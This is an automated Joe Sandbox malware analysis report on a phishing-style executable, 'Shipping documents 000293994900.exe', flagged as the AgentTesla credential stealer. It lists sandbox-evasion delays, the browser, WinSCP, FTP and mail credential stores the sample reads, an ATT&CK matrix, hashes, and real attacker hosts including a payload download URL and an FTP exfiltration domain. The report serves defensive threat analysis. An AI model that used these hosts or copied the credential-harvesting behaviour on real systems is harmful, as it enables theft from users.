Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 595498	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 595391	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 595266	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 595141	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Thread delayed: delay time: 594484	Jump to behavior

Source: Shipping documents 000293994900.exe, 00000004.00000002.3304583690.000000000546E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW5
Source: Shipping documents 000293994900.exe, 00000004.00000002.3304583690.0000000005426000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(\G
Source: Shipping documents 000293994900.exe, 00000004.00000002.3304583690.000000000546E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	API call chain: ExitProcess graph end node			graph_0-4507
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	API call chain: ExitProcess graph end node			graph_0-4511

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe

Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406252

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe

Process created: C:\Users\user\Desktop\Shipping documents 000293994900.exe "C:\Users\user\Desktop\Shipping documents 000293994900.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Queries volume information: C:\Users\user\Desktop\Shipping documents 000293994900.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe

Code function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00405F0A

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 00000004.00000002.3323810255.000000003578C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3323810255.0000000035761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Shipping documents 000293994900.exe PID: 6496, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000293994900.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000004.00000002.3323810255.0000000035761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Shipping documents 000293994900.exe PID: 6496, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 00000004.00000002.3323810255.000000003578C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3323810255.0000000035761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Shipping documents 000293994900.exe PID: 6496, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	1 Masquerading	2 OS Credential Dumping	311 Security Software Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	1 Credentials in Registry	141 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	141 Virtualization/Sandbox Evasion	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	2 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	1 Clipboard Data	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	226 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Shipping documents 000293994900.exe	11%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://api.ipify.org/	0%	URL Reputation	safe
https://api.ipify.org	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
https://api.ipify.org/t	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
api.ipify.org	172.67.74.152	true	false	unknown
concaribe.com	192.185.13.234	true	true	unknown
ftp.concaribe.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false	URL Reputation: safe	unknown
http://84.38.133.42/FZBmQQQpasdj30.bin	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.wikihow.com/Image:Type-Step-1-Version-6.jpg	Shipping documents 000293994900.exe, 00000000.00000002.3040528511.0000000002843000.00000004.00000020.00020000.00000000.sdmp, nsj89C.tmp.0.dr, 660.jpg.0.dr	false		unknown
https://api.ipify.org	Shipping documents 000293994900.exe, 00000004.00000002.3323810255.0000000035711000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ftp.concaribe.com	Shipping documents 000293994900.exe, 00000004.00000002.3323810255.000000003578C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://nsis.sf.net/NSIS_ErrorError	Shipping documents 000293994900.exe	false	URL Reputation: safe	unknown
http://concaribe.com	Shipping documents 000293994900.exe, 00000004.00000002.3323810255.000000003578C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.ipify.org/t	Shipping documents 000293994900.exe, 00000004.00000002.3323810255.0000000035711000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Shipping documents 000293994900.exe, 00000004.00000002.3323810255.0000000035711000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
84.38.133.42	unknown	Latvia	203557	DATACLUB-NL	false
192.185.13.234	concaribe.com	United States	46606	UNIFIEDLAYER-AS-1US	true
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1546020
Start date and time:	2024-10-31 11:38:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Shipping documents 000293994900.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/9@2/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 158 Number of non-executed functions: 83
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Shipping documents 000293994900.exe

Simulations

Behavior and APIs

Time	Type	Description
06:40:51	API Interceptor	117x Sleep call for process: Shipping documents 000293994900.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
192.185.13.234	draft bl_pdf.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	concaribe.com/wp-includes/assets/GkRyQpLAQhPD144.bin
172.67.74.152	67065b4c84713_Javiles.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Yc9hcFC1ux.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	4F08j2Rmd9.bin	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	y8tCHz7CwC.bin	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Prismifyr-Install.exe	Get hash	malicious	Node Stealer	Browse	api.ipify.org/
	2zYP8qOYmJ.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	Proforma Invoice.scr.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	#Uad6c#Ub9e4 #Uc8fc#Ubb38 658749 #Ubc0f 658752..exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	https://www.canva.com/design/DAGVD7_HMvQ/PFkDB3TDx6Ru4nNALhSqqQ/view?utm_content=DAGVD7_HMvQ&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse	104.26.13.205
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	HTMLPhisher	Browse	104.26.12.205
	https://schiller.life/	Get hash	malicious	HTMLPhisher	Browse	104.26.12.205
	SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	Biocon-In-Service Agreement.pdf	Get hash	malicious	EvilProxy, HTMLPhisher	Browse	104.26.13.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UNIFIEDLAYER-AS-1US	HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exe	Get hash	malicious	FormBook	Browse	162.241.63.77
	MP2318GJ-P 18000pcs.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	192.185.118.238
	Receipt.htm	Get hash	malicious	Unknown	Browse	69.49.245.172
	SecuriteInfo.com.Win32.SuspectCrc.28663.30359.exe	Get hash	malicious	FormBook	Browse	162.241.63.77
	http://timecode.com.ar/Webmail/2/Webmail/webmail.php?email=gc@virtualintelligencebriefing.com	Get hash	malicious	HTMLPhisher	Browse	192.185.20.145
	Shipping documents 00039984849900044800.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	192.185.13.234
	z1Transaction_ID_REF2418_cmd.bat	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	50.116.93.185
	z1SWIFT_MT103_Payment_552016_cmd.bat	Get hash	malicious	DBatLoader, FormBook	Browse	50.116.93.185
	Order Specifications for Materials.docx.vbs	Get hash	malicious	DBatLoader, FormBook	Browse	50.116.93.185
	https://mailhotcmhakamloops.wordpress.com/	Get hash	malicious	Unknown	Browse	69.49.230.198
DATACLUB-NL	QUOTE #46789_AL_JAMEELA24.exe	Get hash	malicious	Remcos, GuLoader	Browse	84.38.133.160
	Purchase Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	84.38.129.16
	Documenti di spedizione.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	84.38.129.16
	PO-94858.exe	Get hash	malicious	Snake Keylogger	Browse	185.29.11.116
	PO-94858.exe	Get hash	malicious	Snake Keylogger	Browse	185.29.11.116
	Order 10172024.bat.exe	Get hash	malicious	AgentTesla	Browse	185.29.11.116
	Order 10172024.bat.exe	Get hash	malicious	AgentTesla	Browse	185.29.11.116
	na.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	185.29.11.111
	Upit 220062.xls	Get hash	malicious	Remcos	Browse	185.29.11.111
	1njpP9QcUg.rtf	Get hash	malicious	Unknown	Browse	185.29.11.107
CLOUDFLARENETUS	https://www.transfernow.net/dl/20241030KnXGth9f	Get hash	malicious	Unknown	Browse	104.26.15.166
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	https://flaviarc.com/vrecord%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/	Get hash	malicious	HTMLPhisher	Browse	104.18.3.157
	Eprdtdrqbr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	N#U00b0 DE PEDIDO DE ABARROTES DE NOVIEMBRE 2024.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exe	Get hash	malicious	FormBook	Browse	172.67.177.220
	Proforma Invoice.scr.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	24602711 Inv_Or.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.96.3
	http://www.thearchiterra.gr/	Get hash	malicious	Unknown	Browse	104.17.25.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	https://alaskan.s3.eu-north-1.amazonaws.com/muna.html?login=abc@everbridge.com&pcnt=3&no_redrct=no_redrct&request_type=cancel_request	Get hash	malicious	Unknown	Browse	172.67.74.152
	https://www.transfernow.net/dl/20241030KnXGth9f	Get hash	malicious	Unknown	Browse	172.67.74.152
	Contrato.exe	Get hash	malicious	DarkCloud	Browse	172.67.74.152
	Eprdtdrqbr.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.74.152
	N#U00b0 DE PEDIDO DE ABARROTES DE NOVIEMBRE 2024.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.74.152
	Proforma Invoice.scr.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	MP2318GJ-P 18000pcs.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.74.152
	Quotation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	172.67.74.152
	clipper.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	172.67.74.152
	Invoices.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.74.152

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll	whatsappjpg.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	WEAREX_IHRACAT.exe	Get hash	malicious	GuLoader	Browse
	WEAREX_IHRACAT.exe	Get hash	malicious	GuLoader	Browse
	sample.exe	Get hash	malicious	FormBook, GuLoader	Browse
	sample.exe	Get hash	malicious	GuLoader	Browse
	8737768___19082024.vbs	Get hash	malicious	FormBook, GuLoader	Browse
	8737768___19082024.vbs	Get hash	malicious	GuLoader	Browse
	Q8QeOUbRK0.exe	Get hash	malicious	GuLoader	Browse
	Q8QeOUbRK0.exe	Get hash	malicious	GuLoader	Browse
	Thunderstore Mod Manager - Installer.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Settings.ini

Download File

Process:	C:\Users\user\Desktop\Shipping documents 000293994900.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	50
Entropy (8bit):	4.558562939644915
Encrypted:	false
SSDEEP:	3:RlvjDkAQLQIfLBJXmgxv:R1ZQkIP2I
MD5:	A6216EF9FBE57B11DEEB1B1FD840C392
SHA1:	E554348623EF9ADDDE2FB3F2742D5CC1EF240AB1
SHA-256:	EDF6C9DA71DAF3B3DA2E89A1BC6B9F4B812F18FC133CF4706A3AE983E4040946
SHA-512:	AF5FDD8419B8384361BBEA7600B4DA7860771DD974D3B2D747C6E1C4F7E4DF49FE4BE5FA2320E9041343C8D2AB5912BE1CF279B61ED2A96954C1C2ED05AA0122
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[Common]..Windows=user32::EnumWindows(i r1 ,i 0)..

C:\Users\user\AppData\Local\Temp\nsj89C.tmp

Download File

Process:	C:\Users\user\Desktop\Shipping documents 000293994900.exe
File Type:	data
Category:	dropped
Size (bytes):	906191
Entropy (8bit):	5.453254135383469
Encrypted:	false
SSDEEP:	12288:VTrjp39FQn9MHbbZum6sYEtAm3fCeytwiiPGp7HvDgK/:9p39c6Bp6sYa73fCenrGp7PDgQ
MD5:	4D0CC15D8888DFB984BF2131EC961D71
SHA1:	727EE2CD0FACF40709E8CB0F3AF86B76C6315844
SHA-256:	822E3ED09F9F8FA427634360E49D4959DC97F17DC8F84FFF67952A8EA252C996
SHA-512:	7F20CF4A55E8EAF2055CEA634297996DE8827B1F4208AD87A7BDAC4981C10B126037F96D7567B0FABF5696807B8A65B97FB953C3DF0582766E1002384A84E919
Malicious:	false
Reputation:	low
Preview:	.B......,................................A.......B..........................o...............................................................................................................................................................................................................G...b...............j...............................................................................................................................S...........D...e...]...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsvB4E.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\Shipping documents 000293994900.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	5.813979271513012
Encrypted:	false
SSDEEP:	192:eF2HS5ih/7i00dWz9T7PH6lOFcQMI5+Vw+bPFomi7dJWsP:rSUmlw9T7DmnI5+N273FP
MD5:	7399323923E3946FE9140132AC388132
SHA1:	728257D06C452449B1241769B459F091AABCFFC5
SHA-256:	5A1C20A3E2E2EB182976977669F2C5D9F3104477E98F74D69D2434E79B92FDC3
SHA-512:	D6F28BA761351F374AE007C780BE27758AEA7B9F998E2A88A542EEDE459D18700ADFFE71ABCB52B8A8C00695EFB7CCC280175B5EEB57CA9A645542EDFABB64F1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: whatsappjpg.exe, Detection: malicious, Browse Filename: WEAREX_IHRACAT.exe, Detection: malicious, Browse Filename: WEAREX_IHRACAT.exe, Detection: malicious, Browse Filename: sample.exe, Detection: malicious, Browse Filename: sample.exe, Detection: malicious, Browse Filename: 8737768___19082024.vbs, Detection: malicious, Browse Filename: 8737768___19082024.vbs, Detection: malicious, Browse Filename: Q8QeOUbRK0.exe, Detection: malicious, Browse Filename: Q8QeOUbRK0.exe, Detection: malicious, Browse Filename: Thunderstore Mod Manager - Installer.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....f.R...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............................... ..`.rdata..C....0......."..............@..@.data...x....@.......&..............@....reloc..B....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Uploadable\normallnnens\660.jpg

Download File

Process:	C:\Users\user\Desktop\Shipping documents 000293994900.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, comment: "File source: https://www.wikihow.com/Image:Type-Step-1-Version-6.jpg", baseline, precision 8, 550x309, components 3
Category:	dropped
Size (bytes):	32980
Entropy (8bit):	7.966258347557809
Encrypted:	false
SSDEEP:	768:FU6UE3Rk9Eo7uT/59xGBxipyyZ4D9iBao1htGs5AQ:y6UZE3D5v34D9wL1XGnQ
MD5:	976F85DF642FE509973BCC05E4A32C2B
SHA1:	7A36A94C45039A31FD7A0BAFFCC3ACA8E3AC656A
SHA-256:	68B60014573EF5042B6AB616B17BE733AF6E803EA7096036BC3A075790656233
SHA-512:	7EA1663835C92E178F3DFBA67BCA0DE52CD5690ED775A67A1A5163E0C4ECF309AA05742B6978206811A2BC95222A823AFE982C1A70D24FACF62A493D4078CDF7
Malicious:	false
Reputation:	low
Preview:	......JFIF.....H.H.....FFile source: https://www.wikihow.com/Image:Type-Step-1-Version-6.jpg...C.....................................%...#... , #&'))..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......5.&...........................................f..........................!1Q.Aa.."q......2RS...#4BTUbru......$%3FVWest..6DEc........&'5CGd......7v.................................3.......................1.!A.Q.2aq."R.3B.....#...r............?...\|....@U..P.A@P........(.W..O3R...k(...G....<.,...4..O3B.O3C.ry.A...Q.............(....D.QE.PQ..A5D..T......(.....PM.A5PP...DMA........b...c.K....c.K...E6..q@b.(.P...P..(...`r.Ic..X..Ai.....0)E.....R..`U..@b.....i..b......Q.(.w......#}....D....(..@d..4..4.d..<...t.O3B.O3B.O3K.....<.,.<.....FO3P.2y....h..f..<...y....h..f...f...QE;..P...b.....VIb.h...qA!'..RZv..MZ..tj.M.....m..<6..\|.jK.>..o.'.J...O.o.'.J...>..H.]J..6....D.....>..H.]K....k.'.J...>..H.]B..7.zD..ZzF...H.]..#_..O......g.'.JA....T..BzV...J.]Z.J..

C:\Users\user\Uploadable\normallnnens\Editere.ter

Download File

Process:	C:\Users\user\Desktop\Shipping documents 000293994900.exe
File Type:	data
Category:	dropped
Size (bytes):	380206
Entropy (8bit):	2.283052348265357
Encrypted:	false
SSDEEP:	3072:zZVDR8is0ltz1OWUk+tdYUTn16yd8aXlVDDcwTsKR9A:zZj0COWT+tb6yHXTTsKR9A
MD5:	A1DC683D395B4AAD6AADB883922026D6
SHA1:	72846E629938F0C24DEB9C8AEAD39A51190E1FF4
SHA-256:	80653E80939085343C215D19EB9035353BEB0068AB6EFA11B1BAA4E7D10E1B27
SHA-512:	A430DB1C99ACF3A3FFB73754C18A5FF39B0741B9DCBFA6E5A5CD176DF5E90B058C2958336CA98D6194751C087FCB9BA21651EAE594270255BFD5645DC3006144
Malicious:	false
Reputation:	low
Preview:	d..fa........................................=.................-................................A:..:...............q........k.....................D...Y..........................rp......4................2......C......................<)3....................G.......P...z................e.....o...............N........r...................p.......`........m............. .....a...B3.........E.......1..................................i....................s......5.......5.................h..+...................................'.....h....................o...................&.......................\|....+.............t.........................@....H.].N.........9.....#.........x....................[...F...................c...............T....................+........9................h.....D.........................`.................................JS.......w..................;.........a...m..D.........................................;............................9-...p..............Va........

C:\Users\user\Uploadable\normallnnens\Gaberloonie.Pla73

Download File

